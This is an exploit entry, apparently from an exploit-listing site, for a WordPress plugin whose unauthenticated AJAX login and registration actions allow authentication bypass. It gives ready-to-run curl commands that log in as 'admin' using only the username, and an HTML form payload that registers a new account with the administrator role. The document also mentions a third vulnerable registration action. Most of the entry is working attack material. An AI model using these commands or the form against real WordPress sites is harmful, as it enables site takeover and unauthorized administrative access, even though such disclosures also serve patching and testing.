## https://sploitus.com/exploit?id=WPEX-ID:C311FEEF-7041-4C21-9525-132B9BD32F89
The "theplus_ajax_login" and "theplus_google_ajax_register" AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
Then, the "theplus_google_ajax_register" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically
<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="test@example.com" name="email" type="text">
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>
Finally, the "theplus_ajax_register" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.